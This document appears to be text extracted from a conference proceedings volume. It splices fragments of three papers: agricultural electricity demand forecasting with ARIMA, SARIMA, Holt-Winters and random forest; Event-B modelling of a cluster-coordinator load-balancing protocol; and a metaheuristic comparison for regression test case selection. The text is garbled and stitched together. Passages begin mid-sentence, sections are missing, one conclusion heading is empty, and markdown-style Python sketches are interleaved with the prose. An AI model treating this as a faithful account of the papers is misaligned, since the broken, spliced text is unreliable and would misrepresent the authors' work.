Month  | Actual    | ARIMA     | SARIMA    | Holt-Winters (ES) | Random Forest (RF)
Jan-20 | 30,245.96 | 28,266.80 | 34,850.36 | 32,506.71         | 31,198.37
Feb-20 | 40,777.96 | 31,655.47 | 38,691.08 | 36,581.14         | 34,794.27
Mar-20 | 45,793.18 | 28,248.96 | 42,704.76 | 40,196.50         | 28,699.55
Apr-20 | 4860.68   | 17,126.34 | 4665.74   | 4381.53           | 8737.55
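Using the four test months of Table 4, the RMSPE comparison can be recomputed directly (a small sketch; the paper's exact error figures are not reproduced here):

```python
import math

actual = [30245.96, 40777.96, 45793.18, 4860.68]
models = {
    "ARIMA":  [28266.80, 31655.47, 28248.96, 17126.34],
    "SARIMA": [34850.36, 38691.08, 42704.76, 4665.74],
    "ES":     [32506.71, 36581.14, 40196.50, 4381.53],
    "RF":     [31198.37, 34794.27, 28699.55, 8737.55],
}

def rmspe(y, yhat):
    """Root mean square percentage error."""
    return math.sqrt(sum(((a - f) / a) ** 2 for a, f in zip(y, yhat)) / len(y))

errors = {name: rmspe(actual, pred) for name, pred in models.items()}
best = min(errors, key=errors.get)  # SARIMA gives the smallest RMSPE
```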
Electricity demand forecasting is a crucial aspect of planning in every sector and of
monitoring electricity consumption by the utility; if the available resources are
utilized properly, it benefits the government, consumers and utilities.
Agriculture is one of the sectors that depends on electricity, and there is a need
to forecast its demand according to the season/monsoon. In
the proposed work, time series based mid-term load forecasting is performed to
determine the month-wise electricity consumption pattern in the agricultural sector.
The dataset contains historical electricity consumption data of the agricultural sector,
and different statistical and machine learning techniques are trained on it
to predict one year ahead electricity consumption in the agricultural sector.
ARIMA, seasonal ARIMA, exponential smoothing, and random forest techniques
are used to forecast the future electricity consumption pattern. The results show that
SARIMA outperforms the other three models, as it shows the least error in terms of
RMSE and RMSPE.
To forecast electricity consumption accurately in the agriculture sector, historical
data alone is not sufficient; weather, the level of groundwater, and the type of crops
also have an effect. Thus, in future, regression techniques or intelligent algorithms
can be used for forecasting electricity consumption in the agricultural field.
Acknowledgements The work was supported by Genus Power Infrastructures Limited, and the author
would like to thank FICCI and SERB, which provided funds under the Prime Minister's Fellowship
for Doctoral Research (PMRF). The author is also grateful to Jaipur Vidyut Vitran Nigam Limited
(JVVNL) for their support and for providing the original dataset.
References
1. Moulik, T. K., Dholakia, B. H., & Shukla, P. R. (1990). Energy demand forecast for agriculture
in India. Economic and Political Weekly, A165-A176.
2. http://www.mospi.gov.in/sites/default/files/publication_reports/ES_2020_240420m.pdf
3. http://www.cea.nic.in/reports/others/planning/pdm/growth_2019pdf
4. Eskandarnia, E. M., Kareem, S. A., & Al-Ammal, H. M. (2018). A review of smart meter load
forecasting techniques: Scale and horizon. In IEEE conference April.
5. Cai, M., Pipattanasomporn, M., & Rahman, S. (2019). Day-ahead building-level load forecasts
using deep learning vs. traditional time-series techniques. Applied Energy, 236, 1078–1088.
6. Aprillia, H., Yang, H. T., & Huang, C. M. (2020). Statistical Load Forecasting Using Optimal
Quantile Regression Random Forest and Risk Assessment Index. IEEE Transactions on Smart
Grid.
7. Vera, I., & Langlois, L. (2007). Energy indicators for sustainable development. Energy, 32(6),
875–882.
8. Saravanan, S., & Karunanithi, K. (2018). Forecasting of electric energy consumption in Agri-
culture sector of India using ANN Technique. International Journal of Pure and Applied
Mathematics, 119(10), 261–271.
9. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2019). IoT and agriculture data analysis for smart farm. Computers and Electronics
in Agriculture, 156, 467–474.
10. Kaur, H., & Ahuja, S. (2017). Time series analysis and prediction of electricity consumption of
health care institution using ARIMA model. In Proceedings of Sixth International Conference
on Soft Computing for Problem Solving, pp. 347–358. Springer, Singapore.
11. Panapongpakorn, T., & Banjerdpongchai, D. (2019, January). Short-term load forecast for
energy management systems using time series analysis and neural network method with average
true range. In 2019 First International Symposium on Instrumentation, Control, Artificial
Intelligence, and Robotics (ICA-SYMP), pp. 86–89. IEEE.
12. Katara, S., Faisal, A., & Engmann, G. M. (2014). A time series analysis of electricity demand
in Tamale, Ghana. International Journal of Statistics and Applications, 4(6), 269–275.
13. Moon, J., Kim, Y., Son, M., & Hwang, E. (2018). Hybrid short-term load forecasting scheme
using random forest and multilayer perceptron. Energies, 11(12), 3283.
14. Gardner, E. S., Jr. (2006). Exponential smoothing: The state of the art—Part II. International
Journal of Forecasting, 22(4), 637–666.
15. Moon, J., Kim, J., Kang, P., & Hwang, E. (2020). Solving the cold-start problem in short-term
load forecasting using tree-based methods. Energies, 13(4), 886.
Formal Modelling
of Cluster-Coordinator-Based Load
Balancing Protocol Using Event-B
1 Introduction
In the hierarchical distributed system method, the network is divided into many
clusters. Each cluster has a set of sites. Due to uneven distribution of the load, sites
may be underloaded or overloaded. In each cluster, there is one coordinator where
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 593
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_48
594 S. Shukla et al.
all information about every site is stored, which helps in taking decisions within the
cluster. The coordinator maintains a vector stamp to store the load information of every
site. If any site transfers load to another site in the same cluster, the corresponding
load value is changed. The coordinator site also decides to transfer load to other
clusters when a load transfer request cannot be fulfilled within the cluster. A site
contains the load information, and it is processed according to the requests of the users
[1, 2]. If any site is overloaded, the coordinator checks for the presence of an
underloaded site in its vector table. If it finds one, the load transfer takes place
within the same cluster and the vector value is updated. If none of the sites is
available for accepting the load because of the threshold, the coordinator sends the
load to the coordinator of another cluster [3–5].
In this paper, formal modelling [6] and verification of load transfer are done using
Event-B. Event-B is a formal method well suited to specifying the properties of
distributed systems. We formalize each step of the modelling with the help of functions,
relations and other mathematical objects used in discrete mathematics. An Event-B model
is represented by a machine and a context. The context of the model is the static part,
containing the declarations of sets, constants and axioms, while the machine represents
the dynamic part, containing variables, invariants, theorems and events [7–9].
The remainder of this paper is organized as follows: Section 2 briefly outlines the
Event-B, Sect. 3 describes the cluster-coordinator load balancing protocol, and Sect. 4
presents the formal development of load balancing protocol. Section 5 concludes the
paper.
2 Event-B
Event-B [10–13] is a formal method for modelling and verification of systems.
Formal methods are mathematical techniques to specify system behaviour; they are used
to formalize and verify the functions of the system. Event-B uses the notation of
discrete mathematical logic to specify the properties and functionalities of a system.
An Event-B model is represented in terms of variables, invariants, axioms and a set of
events. Invariants represent properties of the system which should never be violated
during execution. An Event-B model produces proof obligations which must be discharged
in order to verify correctness of the system. Events in a B model represent system
behaviour through their guards and lists of actions [14, 15].
utilizes all site information. The vector load of the cluster helps to know the load
status of each site. When the load value of any site exceeds the threshold value, it is
known as an overloaded site. The load of this overloaded site may either be adjusted
within the same cluster (when sites are available there to take the extra load) or be
transferred to a different cluster (when no adjusting sites are available in the same
cluster and transferring the extra load to them would overload them).
In our system model, SITE and CLUSTER are declared as carrier sets representing the
sets of sites and clusters, respectively. In the static part of the model, we declare
clusterstatus as an enumerated set with the values underloaded and overloaded. The set
loadtrsstatus is also an enumerated set, with the values disable and enable. The
discussion of the variables and invariants (see Fig. 1) is as follows:
(a) The variable clustergroup is defined as a power set of the sites.
(b) The variable clustersitestatus specifies whether the status of a cluster site is
underloaded or overloaded.
(c) The variable loadval represents the load value of every site, which is a natural
number.
(d) Any site can work as a coordinator. The variable coordinator is a subset of the
SITE set.
(e) Variable vlsc shows the vector load stamp of the coordinator. Whenever the load
value of any site is increased or decreased, the vector load stamp of the coordinator
in the cluster is updated with the latest load value of the site. It is modelled
as:

vlsc ∈ SITE → (SITE → ℕ)

The vector vlsc(Si)(Sj) represents the load value of site Sj known to coordinator
Si.
(f) The variable clustercoordinator is a total function from clustergroup to
SITE. It specifies the coordinator site of each cluster. A mapping of the form cc
↦ ss ∈ clustercoordinator specifies that site ss is the coordinator of cluster cc.
(g) The variable loadstatus specifies the load transfer status of a site. If a site is
ready to transfer or receive load, its status is enabled; otherwise it is
disabled.
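As a reading aid only, the Event-B state above can be mirrored in Python (this is an illustrative analogue, not Event-B; all values are made up):

```python
# Illustrative mirror of the Event-B variables.
clustergroup = [{"s1", "s2"}, {"s3", "s4"}]       # clustergroup: subsets of SITE
clustercoordinator = {0: "s1", 1: "s3"}           # cluster index -> coordinator
loadval = {"s1": 5, "s2": 9, "s3": 2, "s4": 7}    # loadval: SITE -> N
loadstatus = {s: "disable" for s in loadval}      # loadtrsstatus values

# vlsc : SITE -> (SITE -> N): each coordinator's view of its sites' loads
vlsc = {"s1": {"s1": 5, "s2": 9}, "s3": {"s3": 2, "s4": 7}}
```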
Description of Events:
(A) Creating Group of Clusters: This event models the creation of a cluster, which
contains a set of sites (see Fig. 2). The guard grd1 shows that cc is a group of
SITE, and guard grd2 ensures that this group is not already present in the existing
cluster group. The event adds cluster cc to the cluster group.
(B) Deciding Coordinator in Cluster: This event specifies the selection of the coor-
dinator in each cluster (see Fig. 3). In this event, we choose the coordinator
and ensure that every cluster has exactly one coordinator. Site ss is in cluster
cc (grd3), and guard grd4 specifies that it has not yet been chosen as coordinator.
On the occurrence of this event, site ss is selected as coordinator of cluster
group cc (act1).
(C) Load Submission: When any new site joins the cluster, we check its load
value. The load value is a natural number that is either greater or less
than the threshold. Every site in the cluster maintains a load value, and the
coordinator site also maintains a vector load stamp. The load submission event is
shown in Fig. 4. Load ld is a natural number, as defined by guard grd5.
The guard grd3 ensures that site ss is the coordinator of cluster cc. The guards
grd6 and grd7 specify that site ss1 is from cluster cc. The load value of site ss1
is increased by load ld, as shown in act1. The vector load stamp of coordinator
ss is updated with the increased load value of site ss1 (act2).
(D) Checking Load Status of Site: This event specifies the status of a site as under-
loaded or overloaded (Fig. 5). If the load value of a site is less than the threshold,
the site is considered underloaded; if the load is greater than the threshold, it is
overloaded. In Fig. 5, we check the load status: site ss1 belongs to SITE and to the
domain of loadvalue (grd1 and grd2). If the load value of ss1 is less than the
threshold (grd3 of Fig. 5a), the clustersite status of ss1 is set to underloaded
(act1). If the load value of ss1 is greater than the threshold (grd3 of Fig. 5b), the
clustersite status of ss1 is set to overloaded (act1).
(E) Sending Load to Coordinator Site: In this event, if any site is overloaded, load
is sent to the coordinator site and the load vector value vlsc is updated (Fig. 6).
The load value of ss1 is greater than the threshold, and the load status of ss1 is
enabled for sending load, as ensured by guards grd10 and grd11, respectively. In
the actions, we ensure that site ss accepts the load by enabling its load status. The
load value of ss1 is decreased by load ld (act2), and the load vector of coordinator
site ss is updated with the load value of site ss1.
(F) Receiving Load From Overloaded Site: This event models the transfer of load
to the coordinator site (Fig. 7). Load ld is the load value of site ss1, and it is
greater than the threshold as ensured by guards grd8 and grd9. The load status of site ss
598 S. Shukla et al.
is enabled (grd10). If all the guards are true, the actions are performed: load
value ld is added to site ss (act1), and the vector load stamp of the coordinator
is updated with the increased value of load ld (act2).
(G) Transferring Load Within Cluster: After receiving load from the overloaded
site, the coordinator searches for an underloaded site that can take load and
balance all the sites in the cluster (Fig. 8). Guards grd4 and grd5 ensure that
coordinator site ss is overloaded, and guards grd9 and grd10 specify that
underloaded site s is present in cluster cc. On the occurrence of this event, load ld
is subtracted from site ss (act1) and the vector load stamp of coordinator site ss
is updated with the decreased value of load ld (act2). Action act3 sets the transfer
load value of site ss to ld.
(H) Receiving of Load by Underloaded Site: This event models the receiving of
load from the coordinator site (Fig. 9). While receiving load, it must be ensured
that the load value of the underloaded site does not exceed the threshold. Guards
grd7 and grd8 specify that the status of sites s and ss is underloaded and
overloaded, respectively. Site ss is the coordinator of cluster cc (grd9). Guard
grd11 specifies that after receiving load ld from coordinator ss, the load value of
site s remains below the threshold. On the occurrence of this event, the load
value of site s is increased by ld (act1) and
Formal Modelling of Cluster-Coordinator-Based Load … 599
the vector value maintained by the coordinator is also updated with the increased
load value (act2).
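The event flow above can be mirrored in a small Python sketch (this is not the Event-B model itself; the threshold, the site names, and the load-shedding amount are assumed purely for illustration):

```python
THRESHOLD = 10  # hypothetical threshold value

def status(load):
    # Event D: a site is underloaded below the threshold, otherwise overloaded
    return "underloaded" if load < THRESHOLD else "overloaded"

loadvalue = {"S1": 3, "S2": 14}   # S1 is the coordinator; S2 is overloaded
vlsc = {"S1": dict(loadvalue)}    # coordinator's vector load stamp

# Events E/F: overloaded S2 sends excess load ld to coordinator S1
ld = loadvalue["S2"] - THRESHOLD + 1   # amount to shed (assumed policy)
loadvalue["S2"] -= ld
loadvalue["S1"] += ld
vlsc["S1"].update(loadvalue)           # act2: vector load stamp updated

# After the transfer, S2 is back under the threshold (Event D check)
assert status(loadvalue["S2"]) == "underloaded"
assert loadvalue["S1"] == 8
```

A transfer to an underloaded site (Events G/H) would apply the symmetric update, subject to the grd11-style guard that the receiver stays below the threshold afterwards.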
5 Conclusion
Acknowledgements This work was done under the Distributed Load Balancing and System Recovery
(DLSR) project governed by the Uttar Pradesh Council of Science and Technology and supported by
PSIT College Kanpur.
Regression Test Case Selection:
A Comparative Analysis of Metaheuristic
Algorithms
Abstract Regression testing is the activity of finding bugs in the modified parts of
software so that software versions can be released on time, avoiding further risks.
Retesting all existing test cases, including obsolete and redundant ones, increases the cost
and effort of the overall process. To reduce this cost and time, optimization
algorithms play a vital role. This paper focuses on the performance analysis of
three recent metaheuristic algorithms, Cuckoo Search, Crow Search Algorithm, and
Harris Hawks Optimization, for solving the Regression Test Case Selection (RTCS) problem.
Fault coverage and execution time have been selected as parameters for performance
evaluation. The experiments are performed and analyzed on the standard SIR repository.
The results and statistical tests show that Cuckoo Search and Crow Search Algorithm
give significantly better results than Harris Hawks Optimization (HHO) for different
parameters of the RTCS problem: Cuckoo Search performed best on fault coverage,
and Crow Search Algorithm performed best on execution time.
1 Introduction
The growth and success of any software industry rest on fulfilling the customer's
requirements and delivering a quality product within the specified time period and
budget. It has therefore become difficult for industries to keep up with ever-changing
customer requirements and technology upgrades [1]. Testing is one of the essen-
tial phases of the SDLC. Moreover, inefficient testing can lead to major economic
A. S. Verma (B)
Dr. A.P.J. Abdul Kalam Technical University, Lucknow, India
A. S. Verma · A. Choudhary
Sharda University, Greater Noida, India
S. Tiwari
ABES Engineering College, Ghaziabad, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 605
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_49
606 A. S. Verma et al.
losses during the development of any software. There exist different software testing
techniques, and regression testing is one of them. Regression testing plays an important
role in the maintenance phase, testing the quality of the software in every update cycle.
The test suite grows as new test cases are added after each addition
of new functionality to the existing code. Rerunning the entire test suite becomes time-
consuming; it may take a week or more to perform regression testing [2].
In addition, regression testing generally consumes a lot of computing resources [3].
Regression Test Case Selection (RTCS) [4–7] aims to select and run only those test
cases that are affected by the code change. RTCS is one of the most explored approaches
to test suite optimization for reducing the effort and cost of the regression testing process.
RTCS is considered an NP-hard problem. Various artificial intelligence algo-
rithms have already been used to solve this complex, multi-objective problem in a
short span of time [8–11]. Being a multi-objective problem, RTCS is an appropriate
target for metaheuristic algorithms.
This paper focuses on a comparative analysis of three recent metaheuristic
algorithms, Cuckoo Search, Crow Search Algorithm, and Harris Hawks Optimiza-
tion, to evaluate their performance on the RTCS problem. An empirical study is
performed on twelve subject programs retrieved from the Software-artifact
Infrastructure Repository (SIR) [12]. The results of the adopted metaheuristic
algorithms are also compared to check which algorithm performs better and provides
the most optimized results, covering the maximum number of faults in minimum
execution time.
The rest of the paper is organized as follows: Sect. 2 discusses the related work carried
out by previous researchers in the domain of RTCS. Section 3 briefly discusses the
problem statement. Section 4 gives an overview of the CS, CSA, and HHO algorithms,
respectively. Section 5 presents the experimental design and the results obtained. Finally,
Sect. 6 concludes the paper with future scope.
2 Related Work
Existing large test suites contain obsolete and redundant test cases, since two
or more test cases may target the same faults or the same requirements, which increases
the size of the test suite. It is therefore recommended to minimize the size of the test
suite [15]. In this paper, the authors consider two test adequacy criteria: execution
time and total fault coverage of test cases.
Given: Let SP denote an existing software program and SP' a modified version of it.
The test suite of program SP is represented by
TS = {tc1, tc2, tc3, . . . , tcm}. Let n ≤ m be a given number, where n represents the
size of the optimal test suite and m represents the total number of test cases in TS.
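Under this formulation, a candidate selection can be scored against the two adequacy criteria named above. A Python sketch with a made-up fault matrix and execution times (these data are purely illustrative, not from the SIR programs):

```python
# Hypothetical fault matrix: covers[i][j] = 1 if test case i detects fault j
covers = [[1, 0, 0, 1],
          [0, 1, 0, 0],
          [1, 1, 0, 0],
          [0, 0, 1, 0]]
exec_time = [3, 2, 4, 1]   # execution time of each test case

def fitness(selection):
    """Faults covered by the selected subset, and its total execution time."""
    faults = set()
    time = 0
    for i, chosen in enumerate(selection):
        if chosen:
            faults |= {j for j, hit in enumerate(covers[i]) if hit}
            time += exec_time[i]
    return len(faults), time

# Selecting test cases 0, 1 and 3 covers all four faults in 6 time units
assert fitness([1, 1, 0, 1]) == (4, 6)
```

A metaheuristic then searches over such binary selection vectors, maximizing fault coverage while minimizing total execution time.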
The Cuckoo Search (CS) algorithm was proposed in 2009 by Xin-She Yang and
Suash Deb [27]. The algorithm mimics the brood-parasitic behavior of cuckoo birds
and utilizes the Lévy flight technique. Cuckoo birds lay their eggs in the nests of
host birds and may remove the host's own eggs. Some host birds tolerate the
cuckoo's egg, while others recognize the intruder; in that case, the host bird throws
the cuckoo's egg out of the nest.
The Cuckoo Search (CS) algorithm works on three basic rules:
1. Each cuckoo lays one egg at a time and places it in a randomly chosen nest.
2. The best nests, containing the highest-quality eggs, are carried over to the next
iteration.
3. The number of host nests is fixed. A host bird can detect a cuckoo's egg with a
probability p ∈ [0, 1] [28].
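The three rules can be turned into a minimal single-variable Cuckoo Search sketch. This is illustrative only: the step scale, the bounds, the test function, and Mantegna's formula for the Lévy step are standard choices, not settings taken from this paper:

```python
import math
import random

def levy_step(beta=1.5):
    """Mantegna's algorithm for a Levy-distributed step (a common CS choice)."""
    sigma = (math.gamma(1 + beta) * math.sin(math.pi * beta / 2) /
             (math.gamma((1 + beta) / 2) * beta * 2 ** ((beta - 1) / 2))) ** (1 / beta)
    u = random.gauss(0, sigma)
    v = random.gauss(0, 1)
    return u / abs(v) ** (1 / beta)

def cuckoo_search(f, lo, hi, n_nests=15, pa=0.25, iters=200):
    """Minimize f over [lo, hi] following the three CS rules above."""
    random.seed(1)
    nests = [random.uniform(lo, hi) for _ in range(n_nests)]
    best = min(nests, key=f)
    for _ in range(iters):
        for i in range(n_nests):
            # Rule 1: each cuckoo lays one egg via a Levy flight, placed in a
            # randomly chosen nest if it is better than that nest's egg
            new = nests[i] + 0.01 * levy_step() * (nests[i] - best)
            new = min(max(new, lo), hi)
            j = random.randrange(n_nests)
            if f(new) < f(nests[j]):
                nests[j] = new
        # Rule 3: a fraction pa of the worst nests is abandoned and rebuilt
        nests.sort(key=f)
        for k in range(int(pa * n_nests)):
            nests[-(k + 1)] = random.uniform(lo, hi)
        best = min(nests + [best], key=f)   # Rule 2: the best nest survives
    return best

x = cuckoo_search(lambda v: (v - 3) ** 2, -10, 10)
assert abs(x - 3) < 0.5
```

For RTCS, the real-valued positions would be mapped to binary selection vectors and f replaced by the fault-coverage/time fitness.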
The Crow Search Algorithm (CSA) was proposed by Askarzadeh in 2016 [29].
CSA is inspired by the foraging behavior of crow flocks. Each crow hides its
surplus food in a hiding place, keeping it from the other crows in the flock [30].
The implementation of the Crow Search Algorithm (CSA) is based on the
following concepts:
• Crows generally live in flocks.
• Crows memorize the locations where they hide food.
• Crows follow other crows in the flock to steal their food.
• Crows are wary of theft and protect their caches with a certain probability.
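These concepts translate into a compact position-and-memory update loop. A minimal one-dimensional sketch follows; the flight length, awareness probability, and test function are assumed values for illustration, not the paper's settings:

```python
import random

def crow_search(f, lo, hi, n=10, fl=2.0, ap=0.1, iters=200):
    """Minimize f over [lo, hi]; fl = flight length, ap = awareness probability."""
    random.seed(1)
    x = [random.uniform(lo, hi) for _ in range(n)]   # crow positions
    m = x[:]                                          # memories: hiding places
    for _ in range(iters):
        for i in range(n):
            j = random.randrange(n)                   # crow i follows crow j
            if random.random() >= ap:
                # crow j is unaware: i moves toward j's hiding place
                new = x[i] + random.random() * fl * (m[j] - x[i])
            else:
                # crow j is aware: it fools i, who ends up at a random position
                new = random.uniform(lo, hi)
            if lo <= new <= hi:                       # keep feasible moves only
                x[i] = new
            if f(x[i]) < f(m[i]):
                m[i] = x[i]                           # update crow i's memory
    return min(m, key=f)

x = crow_search(lambda v: (v - 3) ** 2, -10, 10)
assert abs(x - 3) < 0.5
```

The awareness probability ap balances exploitation (following memories) against exploration (random relocation), which is CSA's main control knob.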
In this section, the authors discuss the experimental design, results, and performance
analysis of Cuckoo Search (CS), Crow Search Algorithm (CSA), and Harris Hawks
Optimization (HHO) in finding the optimal solution in terms of total fault
coverage and execution time for the RTCS problem. The subsections discuss the research
objectives, the parameter settings of the different metaheuristic approaches, the research
hypotheses, and the subject programs used to evaluate performance.
In this paper, the following research questions have been formed to evaluate and
analyze the performance of the algorithms used:
RQ1. Are there any significant differences in the fault coverage capabilities of the
three adopted algorithms for the RTCS problem?
RQ2. Is there any effect of execution time on the performance of the three
approaches used in the study?
The parameter settings used for CS, CSA, and HHO, on which the whole experiment
is performed, are presented in Table 1.
In order to answer the research questions formed in Sect. 5.1, two research
hypotheses have been formed:
H0: CS = CSA = HHO.
Ha: CS ≠ CSA ≠ HHO.
H0: Overall_Execution_Time of CS = Overall_Execution_Time of CSA =
Overall_Execution_Time of HHO.
Ha: Overall_Execution_Time of CS ≠ Overall_Execution_Time of CSA ≠
Overall_Execution_Time of HHO.
In this experiment, the three algorithms are each executed 15 times, with the number
of faults covered selected as the evaluation parameter under the control parameter
settings of Table 1. A total of 500 iterations is used as the stopping criterion in
each run, and the execution time required by each algorithm to catch the maximum
number of faults is also analyzed.
Answer to Research Question 1:
In order to answer Research Question 1, we analyzed the mean values of total
fault coverage. Table 2 depicts the marginal means of fault coverage of the different
algorithms on the different subject programs. The highlighted means show that
the Cuckoo Search (CS) algorithm performs better than the other adopted algorithms,
i.e., the Crow Search Algorithm (CSA) and Harris Hawks Optimization (HHO),
Regression Test Case Selection: A Comparative Analysis … 611
in terms of maximum fault coverage. The tests were performed with the SPSS 20
tool, and the results are presented in Tables 2 and 3.
To confirm these results, a two-way ANOVA test was also performed; the
significance value obtained is less than 0.05 at a 95% confidence interval, as shown
in Table 3. The results show that the null hypothesis is rejected in favor of the alternate
hypothesis. Finally, Fig. 2 shows that the fault coverage capability of Cuckoo Search
is better than that of the other adopted algorithms.
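To make the mechanics of such a significance test concrete, here is a stdlib-only Python computation of a one-way ANOVA F statistic. The paper itself uses a two-way design in SPSS; the per-run fault-coverage samples below are made up purely to illustrate how a large F value leads to rejecting the null hypothesis:

```python
def f_statistic(groups):
    """One-way ANOVA F statistic for a list of sample groups."""
    k = len(groups)                             # number of algorithms
    n = sum(len(g) for g in groups)             # total observations
    grand = sum(sum(g) for g in groups) / n     # grand mean
    ss_between = sum(len(g) * (sum(g) / len(g) - grand) ** 2 for g in groups)
    ss_within = sum((v - sum(g) / len(g)) ** 2 for g in groups for v in g)
    return (ss_between / (k - 1)) / (ss_within / (n - k))

cs  = [12, 13, 12, 14, 13]   # hypothetical faults covered per run
csa = [10, 11, 10, 10, 11]
hho = [8, 9, 8, 8, 9]
F = f_statistic([cs, csa, hho])
# F far exceeds the F(2, 12) critical value at alpha = 0.05, so H0 is rejected
assert F > 3.89
```

In practice the p-value would be read from the F distribution (as SPSS reports); the comparison against the tabulated critical value shown here is equivalent at a fixed alpha.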
Answer to Research Question 2:
In order to answer Research Question 2, we analyzed the marginal means of the
execution time of the three algorithms. Table 4 shows the mean execution
times of the adopted algorithms. The highlighted mean value shows that the
execution time of the Crow Search Algorithm (CSA) is significantly lower than that
of the other algorithms. In Table 5, a two-way ANOVA test is conducted to further
validate the achieved results. The results of the two-way ANOVA test show that the
significance value is less than 0.05, which means that the null hypothesis is rejected
in favor of the alternate hypothesis. We therefore state that the performance of the
Crow Search Algorithm (CSA) in terms of execution time is better than that of the
CS and HHO algorithms.
Fig. 3 shows the estimated marginal means of execution time of the adopted
algorithms, which validates the results of Tables 4 and 5 that the execution time
of CSA is better than that of the CS and HHO algorithms.
On the basis of the results collected and discussed in Sect. 5.4, the authors draw
conclusions about the performance of the adopted metaheuristic algorithms on RTCS.
The answers to the framed research questions show that when solving RTCS problems
using the fault coverage and execution time parameters, the performance of the adopted
algorithms varies. The results reflect that the fault coverage capability of the
Cuckoo Search (CS) algorithm is better than that of the CSA and HHO algorithms; on
the other hand, the execution time of the Crow Search Algorithm (CSA) is lower than
that of the other adopted algorithms. It is also clear from the results that Harris Hawks
Optimization (HHO) is not suitable for solving RTCS problems, as it did not give better
results for either parameter, i.e., fault coverage or execution time.
In the future, the authors will evaluate the performance of other metaheuristic algo-
rithms for solving multi-objective RTCS problems with minimum execution time and
maximum fault coverage. Apart from RTCS problems, the authors can also perform
a comparative analysis of various recent metaheuristic algorithms to evaluate their
performance on test suite minimization as well as test case prioritization
problems.
References
1. Vierhauser, M., Rabiser, R., & Grünbacher, P. (2014). A case study on testing, commis-
sioning, and operation of very-large-scale software systems. In 36th International Conference
on Software Engineering, ICSE Companion 2014—Proceedings (pp. 125–134).
2. Rothermel, G., Untch, R. H., Chu, C., & Harrold, M. J. (1999). Test case prioritization: An
empirical study. In 1999 International Conference on Software Maintenance (ICSM'99).
3. Zhang, L. (2018). Hybrid regression test selection. In ICSE '18: 40th International Conference
on Software Engineering (pp. 199–209).
4. Rothermel, G., & Harrold, M. J. (1997). A safe, efficient regression test selection technique
(no. 2, pp. 1–35).
5. Harrold, M. J., et al. (2001). Regression test selection for Java software. ACM SIGPLAN
Notices, 36(11), 312–326.
6. Briand, L. C., Labiche, Y., & He, S. (2009). Automating regression test selection based on
UML designs. Information and Software Technology, 51(1), 16–30.
7. Orso, A., Shi, N., & Harrold, M. J. (2004) Scaling regression testing to large software systems.
In Proceedings of ACM SIGSOFT Symposium Foundation Software and Engineering (pp. 241–
251).
8. Fister, I., Yang, X. S., Brest, J., & Fister, D. (2013). A brief review of nature-inspired algorithms
for optimization. Elektroteh. Vestnik/Electrotechnical Rev., 80(3), 116–122.
9. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran, M.
(2020). An optimal pruning algorithm of classifier ensembles: dynamic programming approach.
Neural Computer Application, 32(20), 16091–16107.
10. Alweshah, M., Alzubi, O. A., & Alzubi, J. A. (2016). Solving Attribute Reduction Problem
using Wrapper Genetic Programming. International Journal of Computer Science and Network
Security, 16(5), 77–84.
11. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
12. Do, H., Elbaum, S., & Rothermel, G. (2005). Supporting controlled experimentation with
testing techniques: An infrastructure and its potential impact. Empirical Software Engineering,
10(4), 405–435.
13. Yoo, S., & Harman, M. (2007) Pareto efficient multi-objective test case selection. In 2007 ACM
International Symposium on Software Testing and Analysis ISSTA’07 (pp. 140–150).
14. Maia, C. L. B., Do Carmo, R. A. F., De Freitas, F. G., De Campos, G. A. L., & De Souza, J.
T. (2009). A Multi-objective approach for the regression test case selection problem. In XLI
Brazilian Symposium Operation Research XLI SBPO 2009 (pp. 1824–1835).
15. De Souza, L. S., & Prud, R. B. C. (2014). Multi-objective test case selection : a study of the
influence of the catfish effect on PSO based strategies. In An. do XV Work. Testes e Tolerância
a Falhas—WTF 2014 (pp. 3–58).
16. Narciso, E. N., Delamaro, M. E., & De Lourdes Dos Santos Nunes, F. (2014). Test case selection:
A systematic literature review. International Journal of Software Engineering and Knowledge
Engineering, 24(4), 653–676.
17. Panichella, A., Oliveto, R., Di Penta, M., & De Lucia, A. (2015). Improving multi-objective
test case selection by injecting diversity in genetic algorithms. IEEE Transactions on Software
Engineering, 41(4), 358–383.
18. Rosero, R. H., Gómez, O. S., & Rodríguez, G. (2016). 15 Years of software regression
testing techniques—A survey. International Journal of Software Engineering and Knowledge
Engineering, 26(5), 675–689.
19. Hafez, S., Elnainay, M., Abougabal, M., & Elshehaby, S. (2016). Potential-fault cache-based
regression test selection. In 2016 IEEE/ACS 13th International Conference of Computer
Systems and Applications (AICCSA) (vol. 0).
20. Kazmi, R., Jawawi, D. N. A., Mohamad, R., & Ghani, I. (2017) Effective regression test case
selection: A systematic literature review. ACM Computing Surveys, 50(2).
21. Choudhary, A., Agrawal, A. P., & Kaur, A. (2018). An effective approach for regression test
case selection using pareto based multi-objective harmony search. In Proceedings of the 11th
International Workshop on Search-Based Software Testing (vol. August, pp. 13–20).
22. Bajaj, A., Sangwan, O. P. (2018). A survey on regression testing using nature-inspired
approaches. In 2018 4th International Conference on Computing Communication and
Automation (ICCCA) (pp. 1–5).
23. Agrawal, A. P., & Kaur, A. (2018). A comprehensive comparison of ant colony and hybrid
particle swarm optimization algorithms through test case selection. Advances in Intelligent
Systems and Computing, 542(August), 397–405.
24. Correia, D., Abreu, R., Santos, P., Nadkarni, J. (2019) MOTSD: A multi-objective test selec-
tion tool using test suite diagnosability. In ESEC/FSE 2019—Proceedings of the 2019 27th
ACM Joint Meeting on European Software Engineering Conference and Symposium on the
Foundations of Software Engineering (no. May, pp. 1070–1074).
25. Gladston, A., & Niranjana Devi, N. (2020). Optimal test case selection using ant colony and
rough sets. International Journal of Applied Evolutionary Computation (IJAEC), 11(2), 1–14.
26. Agrawal, A. P., Choudhary, A., & Kaur, A. (2020). An effective regression test case selection
using hybrid whale optimization algorithm. International Journal of Distributed Systems and
Technologies (IJDST)., 11(1), 53–67.
